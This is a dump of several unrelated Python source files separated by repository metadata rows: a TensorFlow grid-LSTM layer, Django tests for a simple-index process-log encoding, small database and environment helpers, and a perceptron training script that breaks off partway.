        for j in range(self.num_dof):  # For each state vector
            seq_length = self.seq_len_list[j]
            # Unroll across the time dimension.
            for i in range(seq_length):
                inputs = tf.concat([hidden[j],memory[j]],axis=-1)
                # Standard LSTM gates: update, forget, output, candidate.
                gu = tf.nn.sigmoid(tf.matmul(inputs,self.wu_list[j]) + self.bu_list[j])
                gf = tf.nn.sigmoid(tf.matmul(inputs,self.wf_list[j]) + self.bf_list[j])
                go = tf.nn.sigmoid(tf.matmul(inputs,self.wo_list[j]) + self.bo_list[j])
                gc = tf.nn.tanh(tf.matmul(inputs,self.wc_list[j]) + self.bc_list[j])
                memory[j] = gf*memory[j] + gu*gc
                hidden[j] = tf.nn.tanh(go*memory[j])
        return hidden, memory
# Special layer to have more control over LSTM grid cell
class Original_LSTM_grid_layer(tf.keras.layers.Layer):
    """Grid LSTM: per-input LSTM cells plus a grid mixing step.

    Each of the ``num_dof`` inputs has its own LSTM gate weights; after every
    time step the concatenated hidden states (width ``state_len``) are passed
    through a second set of "grid" gates so the inputs can exchange
    information. ``call`` returns the final hidden and memory lists.
    """

    def __init__(self, input_dim_list, seq_length):
        super(Original_LSTM_grid_layer, self).__init__()
        self.num_dof = len(input_dim_list)      # number of independent inputs
        self.input_dim_list = input_dim_list    # state dimension per input
        self.seq_length = seq_length            # shared unroll length
        self.state_len = sum(input_dim_list)    # width of the concatenated hidden state
        self.initialize_layer()

    def _make_var(self, var_init, shape):
        """Create one trainable float32 variable drawn from var_init."""
        return tf.Variable(
            initial_value=var_init(shape=shape, dtype="float32"),
            trainable=True
        )

    def initialize_layer(self):
        """Create the per-input LSTM weights and the grid-mixing weights.

        The creation order (wu, wf, wo, wc, bu, bf, bo, bc per input, then the
        grid lists) is kept identical to the original so that, with the seeded
        RNG at module import, the initial values are unchanged.
        """
        var_init = tf.random_normal_initializer()
        self.wu_list = []
        self.wf_list = []
        self.wo_list = []
        self.wc_list = []
        self.bu_list = []
        self.bf_list = []
        self.bo_list = []
        self.bc_list = []
        for i in range(self.num_dof):
            dim = self.input_dim_list[i]
            # Kernels map the concatenated [input, hidden] (2*dim) to dim.
            self.wu_list.append(self._make_var(var_init, (2 * dim, dim)))
            self.wf_list.append(self._make_var(var_init, (2 * dim, dim)))
            self.wo_list.append(self._make_var(var_init, (2 * dim, dim)))
            self.wc_list.append(self._make_var(var_init, (2 * dim, dim)))
            self.bu_list.append(self._make_var(var_init, (dim,)))
            self.bf_list.append(self._make_var(var_init, (dim,)))
            self.bo_list.append(self._make_var(var_init, (dim,)))
            self.bc_list.append(self._make_var(var_init, (dim,)))
        self.grid_wu_list = []
        self.grid_wf_list = []
        self.grid_wo_list = []
        self.grid_wc_list = []
        self.grid_bu_list = []
        self.grid_bf_list = []
        self.grid_bo_list = []
        self.grid_bc_list = []
        for i in range(self.num_dof):
            dim = self.input_dim_list[i]
            # Grid kernels map the full concatenated hidden state to each input's dim.
            self.grid_wu_list.append(self._make_var(var_init, (self.state_len, dim)))
            self.grid_wf_list.append(self._make_var(var_init, (self.state_len, dim)))
            self.grid_wo_list.append(self._make_var(var_init, (self.state_len, dim)))
            self.grid_wc_list.append(self._make_var(var_init, (self.state_len, dim)))
            self.grid_bu_list.append(self._make_var(var_init, (dim,)))
            self.grid_bf_list.append(self._make_var(var_init, (dim,)))
            self.grid_bo_list.append(self._make_var(var_init, (dim,)))
            self.grid_bc_list.append(self._make_var(var_init, (dim,)))

    @tf.function
    def call(self, inputs_list):
        """Run the per-input LSTMs plus grid mixing for seq_length steps.

        Assumes inputs_list[i] is (batch, seq_length, input_dim_list[i]) —
        time is indexed as [:, i] below. TODO confirm with callers.
        """
        h_list = []
        m_list = []
        for i in range(self.num_dof):
            batch_dim = tf.shape(inputs_list[i])[0]
            state_dim = tf.shape(inputs_list[i])[2]
            # Zero-initialise hidden state and memory per input.
            hidden = tf.zeros(shape=(batch_dim,state_dim),dtype='float32')
            memory = tf.zeros(shape=(batch_dim,state_dim),dtype='float32')
            h_list.append(hidden)
            m_list.append(memory)
        # Unroll across the time dimension.
        for i in range(self.seq_length):
            # Per-input LSTM update.
            for j in range(self.num_dof):
                temp_input_dim = tf.convert_to_tensor(inputs_list[j])[:,i]
                inputs = tf.concat([temp_input_dim,h_list[j]],axis=-1)
                gu = tf.nn.sigmoid(tf.matmul(inputs,self.wu_list[j]) + self.bu_list[j])
                gf = tf.nn.sigmoid(tf.matmul(inputs,self.wf_list[j]) + self.bf_list[j])
                go = tf.nn.sigmoid(tf.matmul(inputs,self.wo_list[j]) + self.bo_list[j])
                gc = tf.nn.tanh(tf.matmul(inputs,self.wc_list[j]) + self.bc_list[j])
                m_list[j] = gf*m_list[j] + gu*gc
                h_list[j] = tf.nn.tanh(go*m_list[j])
            # Grid mixing: every input sees the concatenation of all hidden states.
            hgrid = tf.concat(h_list,axis=-1)
            for j in range(self.num_dof):
                gu = tf.nn.sigmoid(tf.matmul(hgrid,self.grid_wu_list[j]) + self.grid_bu_list[j])
                gf = tf.nn.sigmoid(tf.matmul(hgrid,self.grid_wf_list[j]) + self.grid_bf_list[j])
                go = tf.nn.sigmoid(tf.matmul(hgrid,self.grid_wo_list[j]) + self.grid_bo_list[j])
                gc = tf.nn.tanh(tf.matmul(hgrid,self.grid_wc_list[j]) + self.grid_bc_list[j])
                m_list[j] = gf*m_list[j] + gu*gc
                h_list[j] = tf.nn.tanh(go*m_list[j])
        return h_list, m_list

    @tf.function
    def regularizer_loss(self):
        """Return the summed L1 penalty over every weight and bias of the layer."""
        regularizer = tf.keras.regularizers.L1(0.01)
        loss = tf.zeros(shape=(1,), dtype=tf.dtypes.float32, name=None)
        for i in range(self.num_dof):
            loss = loss + regularizer(self.wu_list[i]) + regularizer(self.bu_list[i]) + \
                regularizer(self.wf_list[i]) + regularizer(self.bf_list[i]) + \
                regularizer(self.wo_list[i]) + regularizer(self.bo_list[i]) + \
                regularizer(self.wc_list[i]) + regularizer(self.bc_list[i]) + \
                regularizer(self.grid_wu_list[i]) + regularizer(self.grid_bu_list[i]) + \
                regularizer(self.grid_wf_list[i]) + regularizer(self.grid_bf_list[i]) + \
                regularizer(self.grid_wo_list[i]) + regularizer(self.grid_bo_list[i]) + \
                regularizer(self.grid_wc_list[i]) + regularizer(self.grid_bc_list[i])
        return loss
| 35.623094
| 131
| 0.484068
| 1,852
| 16,351
| 4.012419
| 0.068575
| 0.039026
| 0.069439
| 0.081819
| 0.85399
| 0.797066
| 0.785762
| 0.767461
| 0.746871
| 0.719553
| 0
| 0.010425
| 0.407498
| 16,351
| 459
| 132
| 35.623094
| 0.756606
| 0.029906
| 0
| 0.572674
| 0
| 0
| 0.016363
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02907
| false
| 0
| 0.005814
| 0
| 0.055233
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
225cda4ef7bb085bfe0b22dd13de61ac233d014f
| 83
|
py
|
Python
|
pipeline/trainers/classification.py
|
PavelOstyakov/pipeline
|
236c050af3be9dbb534e959589040e9433501e2b
|
[
"MIT"
] | 214
|
2019-01-25T17:03:43.000Z
|
2022-03-08T08:03:27.000Z
|
pipeline/trainers/classification.py
|
anisayari/pipeline
|
48313bc5c459fde0d3fc0acd9f78ccfb677a5197
|
[
"MIT"
] | 10
|
2019-01-25T17:14:02.000Z
|
2019-03-17T21:06:43.000Z
|
pipeline/trainers/classification.py
|
anisayari/pipeline
|
48313bc5c459fde0d3fc0acd9f78ccfb677a5197
|
[
"MIT"
] | 60
|
2019-01-25T17:12:57.000Z
|
2022-02-12T23:52:58.000Z
|
from .base import TrainerBase
class TrainerClassification(TrainerBase):
    """Trainer for classification tasks; inherits all behaviour from TrainerBase."""
| 13.833333
| 41
| 0.795181
| 8
| 83
| 8.25
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156627
| 83
| 5
| 42
| 16.6
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
2275b0a8eeaf49b05fd8be2eff9edd261f04fe53
| 12,602
|
py
|
Python
|
src/encoding/tests/test_simple_index.py
|
HitLuca/predict-python
|
14f2f55cb29f817a5871d4c0b11a3758285301ca
|
[
"MIT"
] | null | null | null |
src/encoding/tests/test_simple_index.py
|
HitLuca/predict-python
|
14f2f55cb29f817a5871d4c0b11a3758285301ca
|
[
"MIT"
] | 6
|
2020-01-28T23:07:17.000Z
|
2022-02-10T00:41:56.000Z
|
src/encoding/tests/test_simple_index.py
|
HitLuca/predict-python
|
14f2f55cb29f817a5871d4c0b11a3758285301ca
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from src.encoding.common import encode_label_logs, LabelTypes
from src.encoding.models import TaskGenerationTypes, ValueEncodings
from src.encoding.simple_index import simple_index
from src.predictive_model.models import PredictiveModels
from src.utils.file_service import get_log
from src.utils.tests_utils import general_example_filepath, general_example_train_filepath, \
general_example_test_filepath, general_example_test_filename, create_test_log, general_example_train_filename, \
create_test_predictive_model, create_test_job, create_test_encoding, create_test_labelling, general_example_filename
from django.test import TestCase
from src.encoding.common import encode_label_logs, LabelTypes
from src.encoding.models import TaskGenerationTypes, ValueEncodings
from src.encoding.simple_index import simple_index
from src.predictive_model.models import PredictiveModels
from src.utils.file_service import get_log
from src.utils.tests_utils import general_example_filepath, general_example_train_filepath, \
general_example_test_filepath, general_example_test_filename, create_test_log, general_example_train_filename, \
create_test_predictive_model, create_test_job, create_test_encoding, create_test_labelling, general_example_filename
class TestSplitLogExample(TestCase):
    """Simple-index encoding of a pre-split (train/test) example event log.

    Labels are remaining-time; the default encoding is SIMPLE_INDEX with
    elapsed time added and one row per trace (ONLY_THIS), prefix length 1.
    """
    def setUp(self):
        # Load the held-out test split and the training split of the example log.
        self.test_log = get_log(create_test_log(log_name=general_example_test_filename,
                                                log_path=general_example_test_filepath))
        self.training_log = get_log(create_test_log(log_name=general_example_train_filename,
                                                    log_path=general_example_train_filepath))
        self.labelling = create_test_labelling(label_type=LabelTypes.REMAINING_TIME.value)
        self.encoding = create_test_encoding(
            value_encoding=ValueEncodings.SIMPLE_INDEX.value,
            add_elapsed_time=True,
            task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
            prefix_length=1)
    def test_shape_training(self):
        """Encoded train/test frames carry the expected columns and shapes."""
        training_df, test_df = encode_label_logs(self.training_log, self.test_log, create_test_job(
            encoding=self.encoding,
            labelling=self.labelling,
            predictive_model=create_test_predictive_model(
                predictive_model=PredictiveModels.CLASSIFICATION.value)
        ))
        self.assert_shape(training_df, (4, 4))
        self.assert_shape(test_df, (2, 4))
    def assert_shape(self, dataframe, shape):
        # Helper: the frame must have the id/label/time/prefix columns and the given shape.
        self.assertIn("trace_id", dataframe.columns.values)
        self.assertIn("label", dataframe.columns.values)
        self.assertIn("elapsed_time", dataframe.columns.values)
        self.assertIn("prefix_1", dataframe.columns.values)
        self.assertEqual(shape, dataframe.shape)
    def test_prefix_length_training(self):
        """prefix_length=3 yields prefix_1..prefix_3 columns and known row values."""
        encoding = create_test_encoding(
            value_encoding=ValueEncodings.SIMPLE_INDEX.value,
            add_elapsed_time=True,
            task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
            prefix_length=3)
        training_df, test_df = encode_label_logs(self.training_log, self.test_log, create_test_job(
            encoding=encoding,
            labelling=self.labelling,
            predictive_model=create_test_predictive_model(
                predictive_model=PredictiveModels.CLASSIFICATION.value)
        ))
        self.assertIn("prefix_1", training_df.columns.values)
        self.assertIn("prefix_2", training_df.columns.values)
        self.assertIn("prefix_3", training_df.columns.values)
        self.assertEqual((4, 6), training_df.shape)
        self.assertEqual((2, 6), test_df.shape)
        # Spot-check a single trace's encoded prefix events and label.
        row = training_df[(training_df.trace_id == '3')].iloc[0]
        self.assertEqual(1, row.prefix_1)
        self.assertEqual(2, row.prefix_2)
        self.assertEqual(1, row.prefix_3)
        self.assertEqual(False, row.label)
        self.assertEqual(0, row.elapsed_time)
    def test_row_test(self):
        """Spot-check one row of the encoded test split."""
        training_df, test_df = encode_label_logs(self.training_log, self.test_log, create_test_job(
            encoding=self.encoding,
            labelling=self.labelling,
            predictive_model=create_test_predictive_model(
                predictive_model=PredictiveModels.CLASSIFICATION.value)
        ))
        row = test_df[(test_df.trace_id == '4')].iloc[0]
        self.assertEqual(1, row.prefix_1)
        self.assertEqual(0, row.elapsed_time)
        self.assertEqual(0, row.label)
    def test_prefix0(self):
        """prefix_length=0 is invalid and must raise ValueError."""
        encoding = create_test_encoding(
            value_encoding=ValueEncodings.FREQUENCY.value,
            add_elapsed_time=True,
            task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
            prefix_length=0)
        self.assertRaises(ValueError,
                          encode_label_logs, self.training_log, self.test_log, create_test_job(
                              encoding=encoding,
                              labelling=self.labelling,
                              predictive_model=create_test_predictive_model(
                                  predictive_model=PredictiveModels.CLASSIFICATION.value)
                          ))
class TestGeneralTest(TestCase):
    """Making sure it actually works: end-to-end checks of simple_index on the example log."""
    def setUp(self):
        # Single example log; remaining-time labels; SIMPLE_INDEX, prefix 1.
        self.log = get_log(create_test_log(log_name=general_example_test_filename,
                                           log_path=general_example_test_filepath))
        self.labelling = create_test_labelling(label_type=LabelTypes.REMAINING_TIME.value)
        self.encoding = create_test_encoding(
            value_encoding=ValueEncodings.SIMPLE_INDEX.value,
            task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
            add_elapsed_time=True,
            prefix_length=1)
    def test_header(self):
        """The encoded frame exposes the expected column names."""
        df = simple_index(self.log, self.labelling, self.encoding)
        self.assertIn("trace_id", df.columns.values)
        self.assertIn("label", df.columns.values)
        self.assertIn("elapsed_time", df.columns.values)
        self.assertIn("prefix_1", df.columns.values)
    def test_prefix1(self):
        """prefix_length=1: one event column plus elapsed time and label."""
        df = simple_index(self.log, self.labelling, self.encoding)
        self.assertEqual(df.shape, (2, 4))
        row1 = df[df.trace_id == '5'].iloc[0]
        self.assertListEqual(['5', 'register request', 0.0, 1576440.0], row1.values.tolist())
        row2 = df[df.trace_id == '4'].iloc[0]
        self.assertListEqual(['4', 'register request', 0.0, 520920.0], row2.values.tolist())
    def test_prefix1_no_label(self):
        """NO_LABEL drops both the label and elapsed-time columns."""
        df = simple_index(self.log, create_test_labelling(label_type=LabelTypes.NO_LABEL.value), self.encoding)
        self.assertEqual(df.shape, (2, 2))
        row1 = df[df.trace_id == '5'].iloc[0]
        self.assertListEqual(['5', 'register request'], row1.values.tolist())
        row2 = df[df.trace_id == '4'].iloc[0]
        self.assertListEqual(['4', 'register request'], row2.values.tolist())
    def test_prefix1_no_elapsed_time(self):
        """Omitting add_elapsed_time leaves only id, event and label columns."""
        label = create_test_labelling(label_type=LabelTypes.REMAINING_TIME.value)
        encoding = create_test_encoding(
            value_encoding=ValueEncodings.FREQUENCY.value,
            task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
            prefix_length=1)
        df = simple_index(self.log, label, encoding)
        self.assertEqual(df.shape, (2, 3))
        row1 = df[df.trace_id == '5'].iloc[0]
        self.assertListEqual(['5', 'register request', 1576440.0], row1.values.tolist())
        row2 = df[df.trace_id == '4'].iloc[0]
        self.assertListEqual(['4', 'register request', 520920.0], row2.values.tolist())
    def test_prefix2(self):
        """prefix_length=2 adds a second event column."""
        df = simple_index(self.log, self.labelling, create_test_encoding(
            value_encoding=ValueEncodings.FREQUENCY.value,
            add_elapsed_time=True,
            task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
            prefix_length=2))
        self.assertEqual(df.shape, (2, 5))
        row1 = df[df.trace_id == '5'].iloc[0]
        self.assertListEqual(['5', 'register request', 'examine casually', 90840.0, 1485600.0], row1.values.tolist())
        row2 = df[df.trace_id == '4'].iloc[0]
        self.assertListEqual(['4', 'register request', 'check ticket', 75840.0, 445080.0], row2.values.tolist())
    def test_prefix5(self):
        """prefix_length=5: five event columns; no NaNs without padding."""
        df = simple_index(self.log, self.labelling, create_test_encoding(
            value_encoding=ValueEncodings.FREQUENCY.value,
            add_elapsed_time=True,
            task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
            prefix_length=5))
        self.assertEqual(df.shape, (2, 8))
        row1 = df[df.trace_id == '5'].iloc[0]
        self.assertListEqual(
            ['5', 'register request', 'examine casually', 'check ticket', 'decide', 'reinitiate request', 458160.0,
             1118280.0], row1.values.tolist())
        self.assertFalse(df.isnull().values.any())
    def test_prefix10(self):
        """prefix_length=10 without padding drops traces shorter than 10 events."""
        df = simple_index(self.log, self.labelling, create_test_encoding(
            value_encoding=ValueEncodings.FREQUENCY.value,
            add_elapsed_time=True,
            task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
            prefix_length=10))
        self.assertEqual(df.shape, (1, 13))
        row1 = df[df.trace_id == '5'].iloc[0]
        self.assertListEqual(
            ['5', 'register request', 'examine casually', 'check ticket', 'decide', 'reinitiate request',
             'check ticket', 'examine casually', 'decide', 'reinitiate request', 'examine casually', 1296240.0,
             280200.0], row1.values.tolist())
    def test_prefix10_padding(self):
        """With padding=True shorter traces are zero-filled instead of dropped."""
        df = simple_index(self.log, self.labelling, create_test_encoding(
            value_encoding=ValueEncodings.FREQUENCY.value,
            add_elapsed_time=True,
            task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
            prefix_length=10, padding=True))
        self.assertEqual(df.shape, (2, 13))
        row1 = df[df.trace_id == '4'].iloc[0]
        self.assertListEqual(
            ['4', 'register request', 'check ticket', 'examine thoroughly', 'decide', 'reject request', 0, 0, 0,
             0, 0, 520920.0, 0.0], row1.values.tolist())
        self.assertFalse(df.isnull().values.any())
    def test_prefix10_all_in_one(self):
        """ALL_IN_ONE emits one row per prefix length up to 10."""
        encoding = create_test_encoding(
            value_encoding=ValueEncodings.FREQUENCY.value,
            add_elapsed_time=True,
            task_generation_type=TaskGenerationTypes.ALL_IN_ONE.value,
            prefix_length=10)
        df = simple_index(self.log, self.labelling, encoding)
        self.assertEqual(df.shape, (10, 13))
        row1 = df[df.trace_id == '5'].iloc[9]
        self.assertListEqual(
            ['5', 'register request', 'examine casually', 'check ticket', 'decide', 'reinitiate request',
             'check ticket', 'examine casually', 'decide', 'reinitiate request', 'examine casually', 1296240.0,
             280200.0], row1.values.tolist())
        self.assertFalse(df.isnull().values.any())
    def test_prefix10_padding_all_in_one(self):
        """ALL_IN_ONE plus padding keeps short traces, zero-filled."""
        encoding = create_test_encoding(
            value_encoding=ValueEncodings.FREQUENCY.value,
            add_elapsed_time=True,
            task_generation_type=TaskGenerationTypes.ALL_IN_ONE.value,
            prefix_length=10,
            padding=True)
        df = simple_index(self.log, self.labelling, encoding)
        self.assertEqual(df.shape, (15, 13))
        row1 = df[df.trace_id == '4'].iloc[4]
        self.assertListEqual(
            ['4', 'register request', 'check ticket', 'examine thoroughly', 'decide', 'reject request', 0, 0, 0,
             0, 0, 520920.0, 0.0], row1.values.tolist())
        self.assertFalse(df.isnull().values.any())
    def test_eval(self):
        """End-to-end on the full (unsplit) example log with prefix_length=12."""
        encoding = create_test_encoding(
            value_encoding=ValueEncodings.FREQUENCY.value,
            task_generation_type=TaskGenerationTypes.ALL_IN_ONE.value,
            add_elapsed_time=True,
            prefix_length=12,
            padding=True)
        df = simple_index(
            get_log(create_test_log(log_path=general_example_filepath, log_name=general_example_filename)),
            create_test_labelling(label_type=LabelTypes.REMAINING_TIME.value), encoding)
        self.assertEqual(df.shape, (41, 15))
        row1 = df[df.trace_id == '4'].iloc[4]
        self.assertListEqual(
            ['4', 'register request', 'check ticket', 'examine thoroughly', 'decide', 'reject request', 0, 0, 0,
             0, 0, 0, 0, 520920.0, 0.0], row1.values.tolist())
        self.assertFalse(df.isnull().values.any())
| 47.91635
| 120
| 0.670052
| 1,507
| 12,602
| 5.348374
| 0.086928
| 0.048387
| 0.017866
| 0.019107
| 0.894913
| 0.854963
| 0.812283
| 0.774194
| 0.762407
| 0.762407
| 0
| 0.031279
| 0.221155
| 12,602
| 262
| 121
| 48.099237
| 0.789913
| 0.002301
| 0
| 0.626667
| 0
| 0
| 0.064773
| 0
| 0
| 0
| 0
| 0
| 0.244444
| 1
| 0.08
| false
| 0
| 0.062222
| 0
| 0.151111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3f59d8c69371420841ae177e7c8bd52daf3ed472
| 24
|
py
|
Python
|
boss/code/CFG/__init__.py
|
henrymoss/BOSS
|
f19eaf7231ed007cce9e12fba0f7f936eb48cfdb
|
[
"Apache-2.0"
] | 16
|
2020-10-06T16:23:29.000Z
|
2022-03-28T05:17:06.000Z
|
boss/code/CFG/__init__.py
|
henrymoss/BOSS
|
f19eaf7231ed007cce9e12fba0f7f936eb48cfdb
|
[
"Apache-2.0"
] | 2
|
2021-11-09T19:21:44.000Z
|
2021-11-29T08:01:19.000Z
|
boss/code/CFG/__init__.py
|
henrymoss/BOSS
|
f19eaf7231ed007cce9e12fba0f7f936eb48cfdb
|
[
"Apache-2.0"
] | 4
|
2021-09-15T11:36:24.000Z
|
2022-02-23T03:33:14.000Z
|
from .CFG import Grammar
| 24
| 24
| 0.833333
| 4
| 24
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 24
| 1
| 24
| 24
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3f694ebcadc8a4ed2b0472121f529e4d33f9e214
| 117
|
py
|
Python
|
maelstrom/__init__.py
|
maelstromio/maelstrom-py
|
b88e73496195d59960c2cff43b97aa6329d39f48
|
[
"MIT"
] | null | null | null |
maelstrom/__init__.py
|
maelstromio/maelstrom-py
|
b88e73496195d59960c2cff43b97aa6329d39f48
|
[
"MIT"
] | null | null | null |
maelstrom/__init__.py
|
maelstromio/maelstrom-py
|
b88e73496195d59960c2cff43b97aa6329d39f48
|
[
"MIT"
] | null | null | null |
import db_utils as db
def connect(cass_ip, cass_kp):
    """Delegate to db_utils.connect with the given connection parameters.

    NOTE(review): parameter semantics inferred from names only (cass_ip =
    Cassandra contact point, cass_kp = keyspace) — confirm against db_utils.
    """
    db.connect(cass_ip, cass_kp)
def close():
    """Delegate to db_utils.close to tear down the module-level connection."""
    db.close()
| 13
| 32
| 0.683761
| 21
| 117
| 3.571429
| 0.47619
| 0.293333
| 0.346667
| 0.453333
| 0.506667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.196581
| 117
| 9
| 33
| 13
| 0.797872
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
58b3a2cd01c83d705550b7654bb9d686133f8d2f
| 42
|
py
|
Python
|
AprendendoPOO/if __name__2.py
|
BrunoRibeiro-P/Curso-De-POO-em-Python
|
cbbdc9fa542fc2ace2c02e290b346f1344f03c98
|
[
"MIT"
] | null | null | null |
AprendendoPOO/if __name__2.py
|
BrunoRibeiro-P/Curso-De-POO-em-Python
|
cbbdc9fa542fc2ace2c02e290b346f1344f03c98
|
[
"MIT"
] | null | null | null |
AprendendoPOO/if __name__2.py
|
BrunoRibeiro-P/Curso-De-POO-em-Python
|
cbbdc9fa542fc2ace2c02e290b346f1344f03c98
|
[
"MIT"
] | null | null | null |
from name import soma
# Runs at import time: prints the result of soma(10, 20) — presumably a sum
# (30); confirm against the `name` module.
print(soma(10, 20))
| 14
| 21
| 0.738095
| 8
| 42
| 3.875
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 0.142857
| 42
| 3
| 22
| 14
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
58fd28c2ce52d6134d6010d2175d9672c29703f8
| 59
|
py
|
Python
|
arbalest/configuration.py
|
Dwolla/arbalest
|
5516aa11a24012a6222acc3b583261ff90ee450f
|
[
"MIT"
] | 46
|
2015-11-01T19:37:46.000Z
|
2021-04-14T02:41:10.000Z
|
arbalest/configuration.py
|
Dwolla/arbalest
|
5516aa11a24012a6222acc3b583261ff90ee450f
|
[
"MIT"
] | 1
|
2016-04-20T16:56:44.000Z
|
2016-04-20T16:56:44.000Z
|
arbalest/configuration.py
|
Dwolla/arbalest
|
5516aa11a24012a6222acc3b583261ff90ee450f
|
[
"MIT"
] | 9
|
2015-10-31T23:01:50.000Z
|
2021-08-02T21:15:25.000Z
|
import os
def env(name):
    """Return the value of environment variable *name*, or None if unset."""
    # os.getenv is a documented alias for os.environ.get with the same
    # missing-key behavior (returns None by default).
    return os.getenv(name)
| 9.833333
| 31
| 0.677966
| 10
| 59
| 4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.20339
| 59
| 5
| 32
| 11.8
| 0.851064
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
45100a02c292063c012c3d5cb0c0ffff43855e75
| 1,590
|
py
|
Python
|
Neural network/perceptron.py
|
radosnystudent/Introduction-to-Neural-network
|
a641f1a04885354fd3888df02c38bd8315979e04
|
[
"MIT"
] | null | null | null |
Neural network/perceptron.py
|
radosnystudent/Introduction-to-Neural-network
|
a641f1a04885354fd3888df02c38bd8315979e04
|
[
"MIT"
] | null | null | null |
Neural network/perceptron.py
|
radosnystudent/Introduction-to-Neural-network
|
a641f1a04885354fd3888df02c38bd8315979e04
|
[
"MIT"
] | null | null | null |
def f(w : list, u : list, m : int) -> int:
    """Heaviside step activation for a perceptron.

    Returns 1 when the dot product of the first m entries of the weight
    vector w and the input vector u is >= 0, else 0.
    """
    # Idiom fix: replace the manual accumulate-then-branch loop with sum()
    # over a generator; same arithmetic, same threshold semantics (x == 0
    # still yields 1, as in the original).
    x = sum(w[i] * u[i] for i in range(m))
    return 1 if x >= 0.0 else 0
def perceptron(u : list, c : float):
    # Train a single-layer perceptron with learning rate c on the 5 patterns
    # in u (each a 26-element 0/1 vector; index 25 appears to be a constant
    # bias input — see main()).
    wt = [1.0 for _ in range(26)]
    t = 1
    counter = 0
    # Stop once 5 consecutive presentations were classified correctly.
    while counter < 5:
        # Target label depends on the position within the 5-pattern cycle.
        zt = 1 if t % 5 < 3 else 0
        yt = f(wt, u[(t-1) % 5], len(wt))
        # Perceptron learning rule: w_i += c * (target - output) * input_i
        for i in range(26):
            wt[i] += c*(zt - yt)*u[(t-1) % 5][i]
        t += 1
        if zt == yt:
            counter += 1
        else:
            counter = 0
    # Report how many presentations were needed and the final weights.
    print(f't: {t}')
    for ind, value in enumerate(wt):
        print(f'w[{ind}] : {value}')
    print('\n')
def main():
    # Five 26-dimensional binary training patterns. The index lists select
    # which positions are 1.0; index 25 is set in every pattern, so it acts
    # as a constant bias input (see the glyph sketches in the module-level
    # string below).
    u = list()
    u.append([1.0 if x in [6,7,12,17,22,25] else 0.0 for x in range(26)])
    u.append([1.0 if x in [2,3,8,13,25] else 0.0 for x in range(26)])
    u.append([1.0 if x in [5,6,11,16,21,25] else 0.0 for x in range(26)])
    u.append([1.0 if x in [6,7,8,11,13,16,17,18,25] else 0.0 for x in range(26)])
